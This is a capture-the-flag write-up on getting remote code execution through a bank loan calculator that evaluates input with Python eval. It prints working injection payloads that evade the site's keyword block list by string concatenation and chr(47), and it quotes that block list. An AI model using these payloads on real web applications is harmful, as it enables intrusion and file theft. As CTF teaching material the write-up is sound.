Challenge Overview
ABC Bank's website has a loan calculator to help its clients calculate the amount they pay if they take a loan from the bank. Unfortunately, they are using an eval function to calculate the loan. Bypassing this will give you Remote Code Execution (RCE). Can you exploit the bank's calculator and read the flag?
The website is running Here.
Solution
Once connected to the website you can try to use: __import__('os').popen('ls').read()
However, the first error will tell you that you can't use OS. When looking at the source code of the website you can see this in a comment near the top: blocking malcious keyword like os,eval,exec,bind,connect,python,socket,ls,cat,shell,bind
So to get around that you can do: __import__('o'+'s').popen('l' + 's').read(). The result is app.py static templates so you can just cat everything in the current directory with __import__('o'+'s').popen('c' + 'at *').read() which will give a better understanding of the code used and what is blocked.
If you look at the second hint it mentions "The flag file is /flag.txt" but you don't even need that you can traverse to the different directories or just use ls / in the root directory to where the flag can be seen: __import__('o'+'s').popen('l' + 's ' + chr(47)).read(). For the representation of / in ascii it is 47 so you can use the chr function to get around it by detecting the / with chr(47).
Result: app bin boot challenge dev etc flag.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var
Once you know that the flag is indeed in the / directory you can just cat out all of the contents with * with this command: __import__('o'+'s').popen('c' + 'at ' + chr(47) + '*').read()
Flag: picoCTF{D0nt_Use_Unsecure_f@nctionsd06...}